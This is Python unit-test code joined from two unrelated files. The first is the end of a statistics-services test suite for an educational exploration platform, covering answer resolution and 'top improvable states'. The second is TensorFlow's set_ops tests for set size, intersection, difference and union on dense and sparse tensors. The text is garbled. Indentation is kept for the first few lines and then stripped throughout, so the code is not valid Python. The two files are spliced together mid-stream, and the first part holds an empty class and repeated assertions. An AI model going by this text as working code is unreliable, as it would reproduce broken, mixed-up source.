        counter = stats_domain.StateCounter.get('eid', 'sname')
        self.assertEqual(counter.resolved_answer_count, 2)
        self.assertEqual(counter.active_answer_count, 1)

        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
        self.assertEqual(answer_log.answers, {'a3': 1})

        # Nothing changes if you try to resolve an answer that has already
        # been resolved.
        stats_services.EventHandler.resolve_answers_for_default_rule(
            'eid', 'sname', self.SUBMIT_HANDLER, ['a1'])
        answer_log = stats_domain.StateRuleAnswerLog.get(
            'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
        self.assertEqual(answer_log.answers, {'a3': 1})
# Resolve the last answer.
stats_services.EventHandler.resolve_answers_for_default_rule(
'eid', 'sname', self.SUBMIT_HANDLER, ['a3'])
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.resolved_answer_count, 3)
self.assertEquals(counter.active_answer_count, 0)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, 'Rule')
self.assertEquals(answer_log.answers, {})
class StatsServicesUnitTests(test_utils.GenericTestBase):
"""Test the statistics services."""
DEFAULT_RULESPEC_STR = exp_domain.DEFAULT_RULESPEC_STR
SUBMIT_HANDLER = stats_services.SUBMIT_HANDLER_NAME
class TopImprovableStatesUnitTests(test_utils.GenericTestBase):
"""Test the get_top_improvable_states() function."""
DEFAULT_RULESPEC_STR = exp_domain.DEFAULT_RULESPEC_STR
SUBMIT_HANDLER = stats_services.SUBMIT_HANDLER_NAME
def test_get_top_improvable_states(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
state_name = exp.init_state_name
for _ in range(5):
stats_services.EventHandler.record_state_hit(
'eid', state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
for _ in range(2):
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '2')
expected_top_state = {
'exp_id': 'eid', 'type': 'default', 'rank': 3,
'state_name': exp.init_state_name
}
states = stats_services.get_top_improvable_states(['eid'], 10)
self.assertEquals(len(states), 1)
self.assertDictContainsSubset(expected_top_state, states[0])
def test_single_default_rule_hit(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
state_name = exp.init_state_name
stats_services.EventHandler.record_state_hit('eid', state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
expected_top_state = {
'exp_id': 'eid', 'type': 'default', 'rank': 1,
'state_name': exp.init_state_name
}
states = stats_services.get_top_improvable_states(['eid'], 2)
self.assertEquals(len(states), 1)
self.assertDictContainsSubset(expected_top_state, states[0])
def test_no_improvement_flag_hit(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
not_default_rule_spec = exp_domain.RuleSpec({
'rule_type': rule_domain.ATOMIC_RULE_TYPE,
'name': 'NotDefault',
'inputs': {},
'subject': 'answer'
}, exp.init_state_name, [], [])
exp.init_state.widget.handlers[0].rule_specs = [
not_default_rule_spec, exp_domain.DEFAULT_RULESPEC
]
exp_services._save_exploration('fake@user.com', exp, '', [])
stats_services.EventHandler.record_state_hit(
'eid', exp.init_state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', exp.init_state_name, self.SUBMIT_HANDLER,
str(not_default_rule_spec), '1')
states = stats_services.get_top_improvable_states(['eid'], 1)
self.assertEquals(len(states), 0)
def test_incomplete_and_default_flags(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
state_name = exp.init_state_name
# Hit the default rule once, and fail to answer twice. The result
# should be classified as incomplete.
for _ in range(3):
stats_services.EventHandler.record_state_hit(
'eid', state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
states = stats_services.get_top_improvable_states(['eid'], 2)
self.assertEquals(len(states), 1)
self.assertEquals(states[0]['rank'], 2)
self.assertEquals(states[0]['type'], 'incomplete')
# Now hit the default two more times. The result should be classified
# as default.
for i in range(2):
stats_services.EventHandler.record_state_hit(
'eid', state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
states = stats_services.get_top_improvable_states(['eid'], 2)
self.assertEquals(len(states), 1)
self.assertEquals(states[0]['rank'], 3)
self.assertEquals(states[0]['type'], 'default')
def test_two_state_default_hit(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
FIRST_STATE_NAME = exp.init_state_name
SECOND_STATE_NAME = 'State 2'
exp.add_states([SECOND_STATE_NAME])
exp_services._save_exploration('fake@user.com', exp, '', [])
# Hit the default rule of state 1 once, and the default rule of state 2
# twice.
stats_services.EventHandler.record_state_hit(
'eid', FIRST_STATE_NAME, True)
stats_services.EventHandler.record_answer_submitted(
'eid', FIRST_STATE_NAME, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
for i in range(2):
stats_services.EventHandler.record_state_hit(
'eid', SECOND_STATE_NAME, True)
stats_services.EventHandler.record_answer_submitted(
'eid', SECOND_STATE_NAME, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
states = stats_services.get_top_improvable_states(['eid'], 5)
self.assertEquals(len(states), 2)
self.assertDictContainsSubset({
'rank': 2,
'type': 'default',
'state_name': SECOND_STATE_NAME
}, states[0])
self.assertDictContainsSubset({
'rank': 1,
'type': 'default',
'state_name': FIRST_STATE_NAME
}, states[1])
# Hit the default rule of state 1 two more times.
for i in range(2):
stats_services.EventHandler.record_state_hit(
'eid', FIRST_STATE_NAME, True)
stats_services.EventHandler.record_answer_submitted(
'eid', FIRST_STATE_NAME, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
states = stats_services.get_top_improvable_states(['eid'], 5)
self.assertEquals(len(states), 2)
self.assertDictContainsSubset({
'rank': 3,
'type': 'default',
'state_name': FIRST_STATE_NAME
}, states[0])
self.assertDictContainsSubset({
'rank': 2,
'type': 'default',
'state_name': SECOND_STATE_NAME
}, states[1])
# Try getting just the top improvable state.
states = stats_services.get_top_improvable_states(['eid'], 1)
self.assertEquals(len(states), 1)
self.assertDictContainsSubset({
'rank': 3,
'type': 'default',
'state_name': FIRST_STATE_NAME
}, states[0])
class UnresolvedAnswersTests(test_utils.GenericTestBase):
"""Test the unresolved answers methods."""
DEFAULT_RULESPEC_STR = exp_domain.DEFAULT_RULESPEC_STR
SUBMIT_HANDLER = stats_services.SUBMIT_HANDLER_NAME
def test_get_unresolved_answers(self):
self.assertEquals(
stats_services.get_unresolved_answers_for_default_rule(
'eid', 'sid'), {})
stats_services.EventHandler.record_answer_submitted(
'eid', 'sid', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR, 'a1')
self.assertEquals(
stats_services.get_unresolved_answers_for_default_rule(
'eid', 'sid'), {'a1': 1})
stats_services.EventHandler.record_answer_submitted(
'eid', 'sid', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR, 'a1')
self.assertEquals(
stats_services.get_unresolved_answers_for_default_rule(
'eid', 'sid'), {'a1': 2})
stats_services.EventHandler.resolve_answers_for_default_rule(
'eid', 'sid', self.SUBMIT_HANDLER, ['a1'])
self.assertEquals(
stats_services.get_unresolved_answers_for_default_rule(
'eid', 'sid'), {})
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for set_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
_DTYPES = set([
tf.int8, tf.int16, tf.int32, tf.int64, tf.uint8, tf.uint16, tf.string])
def _values(values, dtype):
return np.array(
values,
dtype=(np.unicode if (dtype == tf.string) else dtype.as_numpy_dtype))
def _constant(values, dtype):
return tf.constant(_values(values, dtype), dtype=dtype)
def _dense_to_sparse(dense, dtype):
indices = []
values = []
max_row_len = 0
for row in dense:
max_row_len = max(max_row_len, len(row))
shape = [len(dense), max_row_len]
row_ix = 0
for row in dense:
col_ix = 0
for cell in row:
indices.append([row_ix, col_ix])
values.append(str(cell) if dtype == tf.string else cell)
col_ix += 1
row_ix += 1
return tf.SparseTensor(
tf.constant(indices, tf.int64),
tf.constant(values, dtype),
tf.constant(shape, tf.int64))
class SetOpsTest(test_util.TensorFlowTestCase):
def test_set_size_2d(self):
for dtype in _DTYPES:
self._test_set_size_2d(dtype)
def _test_set_size_2d(self, dtype):
self.assertAllEqual(
[1], self._set_size(_dense_to_sparse([[1]], dtype)))
self.assertAllEqual(
[2, 1], self._set_size(_dense_to_sparse([[1, 9], [1]], dtype)))
self.assertAllEqual(
[3, 0], self._set_size(_dense_to_sparse([[1, 9, 2], []], dtype)))
self.assertAllEqual(
[0, 3], self._set_size(_dense_to_sparse([[], [1, 9, 2]], dtype)))
def test_set_size_duplicates_2d(self):
for dtype in _DTYPES:
self._test_set_size_duplicates_2d(dtype)
def _test_set_size_duplicates_2d(self, dtype):
self.assertAllEqual(
[1], self._set_size(_dense_to_sparse([[1, 1, 1, 1, 1, 1]], dtype)))
self.assertAllEqual(
[2, 7, 3, 0, 1],
self._set_size(_dense_to_sparse([
[1, 9],
[6, 7, 8, 8, 6, 7, 5, 3, 3, 0, 6, 6, 9, 0, 0, 0],
[999, 1, -1000],
[],
[-1]
], dtype)))
def test_set_size_3d(self):
for dtype in _DTYPES:
self._test_set_size_3d(dtype)
def test_set_size_3d_invalid_indices(self):
for dtype in _DTYPES:
self._test_set_size_3d(dtype, invalid_indices=True)
def _test_set_size_3d(self, dtype, invalid_indices=False):
if invalid_indices:
indices = tf.constant([
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
[0, 0, 0], [0, 0, 2], # 0,0
# 2,0
[2, 1, 1] # 2,1
], tf.int64)
else:
indices = tf.constant([
[0, 0, 0], [0, 0, 2], # 0,0
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
], tf.int64)
sp = tf.SparseTensor(
indices,
_constant([
1, 9, # 0,0
3, 3, # 0,1
1, # 1,0
9, 7, 8, # 1,1
# 2,0
5 # 2,1
], dtype),
tf.constant([3, 2, 3], tf.int64))
if invalid_indices:
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_size(sp)
else:
self.assertAllEqual([
[2, # 0,0
1], # 0,1
[1, # 1,0
3], # 1,1
[0, # 2,0
1] # 2,1
], self._set_size(sp))
def _set_size(self, sparse_data):
# Validate that we get the same results with or without `validate_indices`.
ops = [
tf.contrib.metrics.set_size(sparse_data, validate_indices=True),
tf.contrib.metrics.set_size(sparse_data, validate_indices=False)
]
with self.test_session() as sess:
results = sess.run(ops)
self.assertAllEqual(results[0], results[1])
return results[0]
def test_set_intersection_multirow_2d(self):
for dtype in _DTYPES:
self._test_set_intersection_multirow_2d(dtype)
def _test_set_intersection_multirow_2d(self, dtype):
a_values = [[9, 1, 5], [2, 4, 3]]
b_values = [[1, 9], [1]]
expected_indices = [[0, 0], [0, 1]]
expected_values = _values([1, 9], dtype)
expected_shape = [2, 2]
expected_counts = [2, 0]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
intersection = self._set_intersection(a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, sp_b))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
intersection = self._set_intersection(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_intersection_count(sp_a, sp_b))
def test_dense_set_intersection_multirow_2d(self):
for dtype in _DTYPES:
self._test_dense_set_intersection_multirow_2d(dtype)
def _test_dense_set_intersection_multirow_2d(self, dtype):
a_values = [[9, 1, 5], [2, 4, 3]]
b_values = [[1, 9], [1, 5]]
expected_indices = [[0, 0], [0, 1]]
expected_values = _values([1, 9], dtype)
expected_shape = [2, 2]
expected_counts = [2, 0]
# Dense to dense.
a = _constant(a_values, dtype)
b = _constant(b_values, dtype)
intersection = self._set_intersection(a, b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, b))
def test_set_intersection_duplicates_2d(self):
for dtype in _DTYPES:
self._test_set_intersection_duplicates_2d(dtype)
def _test_set_intersection_duplicates_2d(self, dtype):
a_values = [[1, 1, 3]]
b_values = [[1]]
expected_indices = [[0, 0]]
expected_values = _values([1], dtype)
expected_shape = [1, 1]
expected_counts = [1]
# Dense to dense.
a = _constant(a_values, dtype=dtype)
b = _constant(b_values, dtype=dtype)
intersection = self._set_intersection(a, b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, b))
# Dense to sparse.
sp_b = _dense_to_sparse(b_values, dtype=dtype)
intersection = self._set_intersection(a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, sp_b))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
intersection = self._set_intersection(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_intersection_count(sp_a, sp_b))
def test_set_intersection_3d(self):
for dtype in _DTYPES:
self._test_set_intersection_3d(dtype=dtype)
def test_set_intersection_3d_invalid_indices(self):
for dtype in _DTYPES:
self._test_set_intersection_3d(dtype=dtype, invalid_indices=True)
def _test_set_intersection_3d(self, dtype, invalid_indices=False):
if invalid_indices:
indices = tf.constant([
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
[0, 0, 0], [0, 0, 2], # 0,0
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
else:
indices = tf.constant([
[0, 0, 0], [0, 0, 2], # 0,0
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
sp_a = tf.SparseTensor(
indices,
_constant([
1, 9, # 0,0
3, 3, # 0,1
1, # 1,0
9, 7, 8, # 1,1
# 2,0
5 # 2,1
# 3,*
], dtype),
tf.constant([4, 2, 3], tf.int64))
sp_b = tf.SparseTensor(
tf.constant([
[0, 0, 0], [0, 0, 3], # 0,0
# 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], # 1,1
[2, 0, 1], # 2,0
[2, 1, 1], # 2,1
[3, 0, 0], # 3,0
[3, 1, 0] # 3,1
], tf.int64),
_constant([
1, 3, # 0,0
# 0,1
3, # 1,0
7, 8, # 1,1
2, # 2,0
5, # 2,1
4, # 3,0
4 # 3,1
], dtype),
tf.constant([4, 2, 4], tf.int64))
if invalid_indices:
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_intersection(sp_a, sp_b)
else:
expected_indices = [
[0, 0, 0], # 0,0
# 0,1
# 1,0
[1, 1, 0], [1, 1, 1], # 1,1
# 2,0
[2, 1, 0], # 2,1
# 3,*
]
expected_values = _values([
1, # 0,0
# 0,1
# 1,0
7, 8, # 1,1
# 2,0
5, # 2,1
# 3,*
], dtype)
expected_shape = [4, 2, 2]
expected_counts = [[
1, # 0,0
0 # 0,1
], [
0, # 1,0
2 # 1,1
], [
0, # 2,0
1 # 2,1
], [
0, # 3,0
0 # 3,1
]]
# Sparse to sparse.
intersection = self._set_intersection(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_intersection_count(sp_a, sp_b))
# NOTE: sparse_to_dense doesn't support uint8 and uint16.
if dtype not in [tf.uint8, tf.uint16]:
# Dense to sparse.
a = tf.cast(
tf.sparse_to_dense(
sp_a.indices,
sp_a.shape,
sp_a.values,
default_value="-1" if dtype == tf.string else -1),
dtype=dtype)
intersection = self._set_intersection(a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_intersection_count(a, sp_b))
# Dense to dense.
b = tf.cast(
tf.sparse_to_dense(
sp_b.indices,
sp_b.shape,
sp_b.values,
default_value="-2" if dtype == tf.string else -2),
dtype=dtype)
intersection = self._set_intersection(a, b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, b))
def _set_intersection(self, a, b):
# Validate that we get the same results with or without `validate_indices`.
ops = [
tf.contrib.metrics.set_intersection(a, b, validate_indices=True),
tf.contrib.metrics.set_intersection(a, b, validate_indices=False)
]
with self.test_session() as sess:
results = sess.run(ops)
self.assertAllEqual(results[0].indices, results[1].indices)
self.assertAllEqual(results[0].values, results[1].values)
self.assertAllEqual(results[0].shape, results[1].shape)
return results[0]
def _set_intersection_count(self, a, b):
op = tf.contrib.metrics.set_size(tf.contrib.metrics.set_intersection(a, b))
with self.test_session() as sess:
return sess.run(op)
def test_set_difference_multirow_2d(self):
for dtype in _DTYPES:
self._test_set_difference_multirow_2d(dtype)
def _test_set_difference_multirow_2d(self, dtype):
a_values = [[1, 1, 1], [1, 5, 9], [4, 5, 3], [5, 5, 1]]
b_values = [[], [1, 2], [1, 2, 2], []]
# a - b.
expected_indices = [
[0, 0], [1, 0], [1, 1], [2, 0], [2, 1], [2, 2], [3, 0], [3, 1]
]
expected_values = _values([1, 5, 9, 3, 4, 5, 1, 5], dtype)
expected_shape = [4, 3]
expected_counts = [1, 2, 3, 2]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
difference = self._set_difference(a, sp_b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(a, sp_b, True))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
difference = self._set_difference(sp_a, sp_b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, True))
# b - a.
expected_indices = [[1, 0], [2, 0], [2, 1]]
expected_values = _values([2, 1, 2], dtype)
expected_shape = [4, 2]
expected_counts = [0, 1, 2, 0]
# Dense to sparse.
difference = self._set_difference(a, sp_b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(a, sp_b, False))
# Sparse to sparse.
difference = self._set_difference(sp_a, sp_b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, False))
def test_dense_set_difference_multirow_2d(self):
for dtype in _DTYPES:
self._test_dense_set_difference_multirow_2d(dtype)
def _test_dense_set_difference_multirow_2d(self, dtype):
a_values = [[1, 5, 9], [4, 5, 3]]
b_values = [[1, 2, 6], [1, 2, 2]]
# a - b.
expected_indices = [[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]]
expected_values = _values([5, 9, 3, 4, 5], dtype)
expected_shape = [2, 3]
expected_counts = [2, 3]
# Dense to dense.
a = _constant(a_values, dtype=dtype)
b = _constant(b_values, dtype=dtype)
difference = self._set_difference(a, b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_difference_count(a, b, True))
# b - a.
expected_indices = [[0, 0], [0, 1], [1, 0], [1, 1]]
expected_values = _values([2, 6, 1, 2], dtype)
expected_shape = [2, 2]
expected_counts = [2, 2]
# Dense to dense.
difference = self._set_difference(a, b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(a, b, False))
def test_sparse_set_difference_multirow_2d(self):
for dtype in _DTYPES:
self._test_sparse_set_difference_multirow_2d(dtype)
def _test_sparse_set_difference_multirow_2d(self, dtype):
sp_a = _dense_to_sparse(
[[], [1, 5, 9], [4, 5, 3, 3, 4, 5], [5, 1]], dtype=dtype)
sp_b = _dense_to_sparse([[], [1, 2], [1, 2, 2], []], dtype=dtype)
# a - b.
expected_indices = [[1, 0], [1, 1], [2, 0], [2, 1], [2, 2], [3, 0], [3, 1]]
expected_values = _values([5, 9, 3, 4, 5, 1, 5], dtype)
expected_shape = [4, 3]
expected_counts = [0, 2, 3, 2]
difference = self._set_difference(sp_a, sp_b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, True))
# b - a.
expected_indices = [[1, 0], [2, 0], [2, 1]]
expected_values = _values([2, 1, 2], dtype)
expected_shape = [4, 2]
expected_counts = [0, 1, 2, 0]
difference = self._set_difference(sp_a, sp_b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, False))
def test_set_difference_duplicates_2d(self):
for dtype in _DTYPES:
self._test_set_difference_duplicates_2d(dtype)
def _test_set_difference_duplicates_2d(self, dtype):
a_values = [[1, 1, 3]]
b_values = [[1, 2, 2]]
# a - b.
expected_indices = [[0, 0]]
expected_values = _values([3], dtype)
expected_shape = [1, 1]
expected_counts = [1]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
difference = self._set_difference(a, sp_b, True)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, difference,
dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(a, sp_b, True))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
difference = self._set_difference(sp_a, sp_b, True)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, difference,
dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(a, sp_b, True))
# b - a.
expected_indices = [[0, 0]]
expected_values = _values([2], dtype)
expected_shape = [1, 1]
expected_counts = [1]
# Dense to sparse.
difference = self._set_difference(a, sp_b, False)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, difference,
dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(a, sp_b, False))
# Sparse to sparse.
difference = self._set_difference(sp_a, sp_b, False)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, difference,
dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(a, sp_b, False))
def test_sparse_set_difference_3d(self):
for dtype in _DTYPES:
self._test_sparse_set_difference_3d(dtype)
def test_sparse_set_difference_3d_invalid_indices(self):
for dtype in _DTYPES:
self._test_sparse_set_difference_3d(dtype, invalid_indices=True)
def _test_sparse_set_difference_3d(self, dtype, invalid_indices=False):
if invalid_indices:
indices = tf.constant([
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
[0, 0, 0], [0, 0, 2], # 0,0
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
else:
indices = tf.constant([
[0, 0, 0], [0, 0, 2], # 0,0
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
sp_a = tf.SparseTensor(
indices,
_constant([
1, 9, # 0,0
3, 3, # 0,1
1, # 1,0
9, 7, 8, # 1,1
# 2,0
5 # 2,1
# 3,*
], dtype),
tf.constant([4, 2, 3], tf.int64))
sp_b = tf.SparseTensor(
tf.constant([
[0, 0, 0], [0, 0, 3], # 0,0
# 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], # 1,1
[2, 0, 1], # 2,0
[2, 1, 1], # 2,1
[3, 0, 0], # 3,0
[3, 1, 0] # 3,1
], tf.int64),
_constant([
1, 3, # 0,0
# 0,1
3, # 1,0
7, 8, # 1,1
2, # 2,0
5, # 2,1
4, # 3,0
4 # 3,1
], dtype),
tf.constant([4, 2, 4], tf.int64))
if invalid_indices:
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_difference(sp_a, sp_b, False)
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_difference(sp_a, sp_b, True)
else:
# a-b
expected_indices = [
[0, 0, 0], # 0,0
[0, 1, 0], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], # 1,1
# 2,*
# 3,*
]
expected_values = _values([
9, # 0,0
3, # 0,1
1, # 1,0
9, # 1,1
# 2,*
# 3,*
], dtype)
expected_shape = [4, 2, 1]
expected_counts = [[
1, # 0,0
1 # 0,1
], [
1, # 1,0
1 # 1,1
], [
0, # 2,0
0 # 2,1
], [
0, # 3,0
0 # 3,1
]]
difference = self._set_difference(sp_a, sp_b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_difference_count(sp_a, sp_b))
# b-a
expected_indices = [
[0, 0, 0], # 0,0
# 0,1
[1, 0, 0], # 1,0
# 1,1
[2, 0, 0], # 2,0
# 2,1
[3, 0, 0], # 3,0
[3, 1, 0] # 3,1
]
expected_values = _values([
3, # 0,0
# 0,1
3, # 1,0
# 1,1
2, # 2,0
# 2,1
4, # 3,0
4, # 3,1
], dtype)
expected_shape = [4, 2, 1]
expected_counts = [[
1, # 0,0
0 # 0,1
], [
1, # 1,0
0 # 1,1
], [
1, # 2,0
0 # 2,1
], [
1, # 3,0
1 # 3,1
]]
difference = self._set_difference(sp_a, sp_b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, False))
def _set_difference(self, a, b, aminusb=True):
# Validate that we get the same results with or without `validate_indices`.
ops = [
tf.contrib.metrics.set_difference(
a, b, aminusb=aminusb, validate_indices=True),
tf.contrib.metrics.set_difference(
a, b, aminusb=aminusb, validate_indices=False)
]
with self.test_session() as sess:
results = sess.run(ops)
self.assertAllEqual(results[0].indices, results[1].indices)
self.assertAllEqual(results[0].values, results[1].values)
self.assertAllEqual(results[0].shape, results[1].shape)
return results[0]
def _set_difference_count(self, a, b, aminusb=True):
op = tf.contrib.metrics.set_size(
tf.contrib.metrics.set_difference(a, b, aminusb))
with self.test_session() as sess:
return sess.run(op)
def test_set_union_multirow_2d(self):
for dtype in _DTYPES:
self._test_set_union_multirow_2d(dtype)
def _test_set_union_multirow_2d(self, dtype):
a_values = [[9, 1, 5], [2, 4, 3]]
b_values = [[1, 9], [1]]
expected_indices = [[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [1, 3]]
expected_values = _values([1, 5, 9, 1, 2, 3, 4], dtype)
expected_shape = [2, 4]
expected_counts = [3, 4]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
union = self._set_union(a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, union, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_union_count(a, sp_b))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
union = self._set_union(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, union, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_union_count(sp_a, sp_b))
def test_dense_set_union_multirow_2d(self):
for dtype in _DTYPES:
self._test_dense_set_union_multirow_2d(dtype)
def _test_dense_set_union_multirow_2d(self, dtype):
a_values = [[9, 1, 5], [2, 4, 3]]
b_values = [[1, 9], [1, 2]]
expected_indices = [[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [1, 3]]
expected_values = _values([1, 5, 9, 1, 2, 3, 4], dtype)
expected_shape = [2, 4]
expected_counts = [3, 4]
# Dense to dense.
a = _constant(a_values, dtype=dtype)
b = _constant(b_values, dtype=dtype)
union = self._set_union(a, b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, union, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_union_count(a, b))
def test_set_union_duplicates_2d(self):
for dtype in _DTYPES:
self._test_set_union_duplicates_2d(dtype)
def _test_set_union_duplicates_2d(self, dtype):
